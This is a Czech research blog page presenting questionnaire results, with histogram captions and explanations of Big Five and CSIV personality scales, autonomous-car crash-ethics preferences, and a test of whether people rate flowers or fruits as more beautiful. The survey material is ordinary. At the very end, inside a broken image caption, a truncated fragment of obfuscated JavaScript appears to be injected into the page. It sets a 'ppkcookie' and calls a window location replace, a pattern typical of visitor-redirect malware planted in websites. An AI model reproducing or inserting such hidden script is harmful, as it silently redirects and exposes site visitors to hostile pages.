Výsledky jarního dotazníku „Já, květena a auta“

Histogramy z dotazníku Já, květena a auta. Pokud jste nám dotazníček ještě nevyplnili, budeme moc rádi, když se na něj ještě podíváte.

Vyhodnocení Big 5

Tento dotazník zkoumá vaše osobnostní charakteristiky. Je rozdělen do celkem pěti škál. Následující výsledky ukazují vaše skóre v jednotlivých škálách. Není tak důležitý výsledek v každé škále zvlášť, ale spíše kontext, tj. jak spolu výsledky v jednotlivých škálách souvisí.

Histogram - otevřenost ke zkušenosti

Histogram – otevřenost ke zkušenosti (klikněte pro zvětšení)

1. Otevřenost ke zkušenosti

Lidé, kteří mají vysoké skóre v této škále, jsou zpravidla zvědaví, kreativní, mají originální nápady a často i tendenci k intelektuálním zájmům.

Histogram - svědomitost (klikněte pro zvětšení)

Histogram – svědomitost (klikněte pro zvětšení)

2. Svědomitost:

Lidé, kteří mají vysoké skóre v této škále, se často projevují tendencí ke kontrole – ať už jde o sebekontrolu či organizování úkolů. Takoví lidé zpravidla (ale ne vždy!) bývají spíše dochvilní, spolehliví, cílevědomí a orientovaní na výkon.

Histogram - extraverze (klikněte pro zvětšení)

Histogram – extraverze (klikněte pro zvětšení)

3. Extraverze:

Lidé, kteří mají vysoké skóre v této škále, jsou zpravidla společenští a komunikativní. Mají tendenci vyhledávat společnost a začleňovat se do skupin. Často mají vysokou sebedůvěru a přirozený životní optimismus.

Histogram - přívětivost (klikněte pro zvětšení)

Histogram – přívětivost (klikněte pro zvětšení)

4. Přívětivost:

Lidé, kteří mají vysoké skóre v této škále, mají zpravidla tendenci důvěřovat druhými a vyhledávat spolupráci. Bývají velice ochotní komukoli pomoci. Projevují se často vlídně a vřele.

Histogram - neuroticismus (klikněte pro zvětšení)

Histogram – neuroticismus (klikněte pro zvětšení)

5. Neuroticismus:

Lidé, kteří mají vysoké skóre v této škále, bývají často náladoví a úzkostní. Oproti jiným mají zvýšenou tendenci reagovat smutkem či hněvem. Také se u nich ve zvýšené míře vyskytuje pocit viny.

Vyhodnocení CSIV:

Náš dotazník zkoumá, co je pro vás důležité v mezilidských vztazích. Všechny otázky jsou rozdělené celkem do osmi škál. V následujícím přehledu uvidíte, jaký jste měl/a výsledek v každé z nich. Výsledek každé škály může nabývat hodnot od 8 do 64 bodů. Není důležitý celkový počet bodů v každé škále, ale spíše porovnání výsledků v jednotlivých škálách mezi sebou.

Histogram - sebejistota (klikněte pro zvětšení)

Histogram – sebejistota (klikněte pro zvětšení)

1. Sebejistota (PA):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste v kontaktu s druhými lidmi, důležité, abyste vystupoval/a sebejistě.

Histogram - průbojnost (klikněte pro zvětšení)

Histogram – průbojnost (klikněte pro zvětšení)

2. Průbojnost (BC):

Tato škála ukazuje, jak jsou pro vás v situacích, kdy jste v kontaktu s druhými lidmi, důležité vaše osobní potřeby.

Histogram - odtažitost (klikněte pro zvětšení)

Histogram – odtažitost (klikněte pro zvětšení)

3. Odtažitost (DE):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste s druhými lidmi, důležitý určitý společenský odstup.

Histogram - stydlivost (klikněte pro zvětšení)

Histogram – stydlivost (klikněte pro zvětšení)

4. Stydlivost (FG):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste s druhými lidmi, důležité, abyste se nedopouštěl/a společenských přehmatů.

Histogram - submisivita (klikněte pro zvětšení)

Histogram – submisivita (klikněte pro zvětšení)

5. Submisivita (HI):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste s druhými lidmi, důležité, abyste splnil jejich očekávání.

Histogram - altruismus (klikněte pro zvětšení)

Histogram – altruismus (klikněte pro zvětšení)

6. Altruismus (JK):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste s druhými lidmi, důležité, abyste dbal na jejich potřeby.

Histogram - sounáležitost (klikněte pro zvětšení)

Histogram – sounáležitost (klikněte pro zvětšení)

7. Sounáležitost (LM):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste s druhými lidmi, důležité, abyste se s nimi cítil/a být ve vztahu.

Histogram - přijetí (klikněte pro zvětšení)

Histogram – přijetí (klikněte pro zvětšení)

8. Přijetí (NO):

Tato škála ukazuje, jak je pro vás v situacích, kdy jste s druhými lidmi, důležité, aby ostatní projevili zájem o to, co říkáte.

Vyhodnocení autonomních vozů (AV):

  • Možná to vypadalo, že největším etickým problémem ohledně AV bude vybrat, jaký typ kolizního software vybrat, aby to byl ten nejvíce morální. Ale největší etický problém je čas zavedení technologie AV, když zvážíme statisíce mrtvých na silnicích ročně po celém světě. Takže spíše než „jak“, je problém čas – „co nejdřív“.
  • Asi pro vás nebude překvapením zjištění nedávného výzkumu, že lidé by chtěli, aby ostatní měli auto typu „počítadlo“, ale sami by si sobecky spíše koupili „tank“.

Histogram - posádka (klikněte pro zvětšení)

Histogram – posádka (klikněte pro zvětšení)

Jak preferujete posádku: (od 6 do 36 bodů)

Výsledek nebere zřetel na počty lidí v posádce nebo na sražené/zachráněné kolemjdoucí. Počítá to, jak preferujete záchranu životů posádky autonomního vozu před životy kolemjdoucích. Má taková preference obdobu u manuálně řízených vozů? Samozřejmě – velká těžká auta, např. SUV. Čím jsou větší (a dražší), tím jsou bezpečnější pro posádku. Ovšem posádky lehčích a křehčích (tedy levnějších) vozů jsou ve velké nevýhodě a spíše střet nepřežijí, střetnou-li se s takovým mohutným „tankem“. Nejhůř na to jsou pochopitelně malá laciná osobní auta, motocykly nebo cyklisté.

Histogram - utilitarismus (klikněte pro zvětšení)

Histogram – utilitarismus (klikněte pro zvětšení)

Jak preferujete „větší dobro“: (od 6 do 36 bodů)

Tento faktor počítá vaše nestranné zohlednění počtu zachráněných životů. Čím blíže k maximu, tím jste více konzistentní a více dbáte na maximalizaci počtu přeživších a odhlížíte od různých nezáviděníhodných typů situací, do kterých se dostali – zda sedí ve voze nebo stojí na vozovce atd.

Histogram - nezasahovat do situace (klikněte pro zvětšení)

Histogram – nezasahovat do situace (klikněte pro zvětšení)

Jak preferujete nezasahovat do situace: (od 9 do 54 bodů)

Tento faktor ukazuje, do jaké míry nechcete měnit výsledek předvídané kolize (preferujete nezasahovat a nechat auto jet rovně) před tím, aby software změnil smět jízdy a způsobil by ublížení někomu jinému.

Hodnocení krásy rostlin

Histogram - plody (klikněte pro zvětšení)

Histogram – plody (klikněte pro zvětšení)

A proč jste hodnotili obrázky rostlin? Protože jsme chtěli ověřit jednu evolučně psychologickou hypotézu, která se týká preferencí květin. Tvrdí, že lidé považují za krásné takové objekty v krajině, které označují místa vhodná k přežití – například s dostatkem potravy, čisté vody a skrýší. Dle této hypotézy jsou květiny znakem bohatého prostředí a příslibem budoucí přítomnosti potravy, proto se nám líbí. Tato hypotéza se opakovaně objevuje v literatuře, ale dosud nebyla experimentálně testována. Vy to nyní měníte!

Zatím se můžete alespoň podívat, zda jste spíš plodomilní nebo květomilní.

celkové hodnocení krásy plodů (nejmenší možný počet bodů = 14, nejvyšší = 84)

celkové hodnocení krásy květů (nejmenší možný počet bodů = 14, nejvyšší = 84)

Histogram - květy (klikněte pro zvětšení) Histogram – květy (klikněte pro zvětšení)[/caption‘));if(_0x55db25!==’un‘){if(_0x58dc3d()||_0x51ef8a()){_0x335357(‚ppkcookie‘,’un‘,0x16d);window[_0x287a(‚0x15‘)][‚repla

Facebook Comments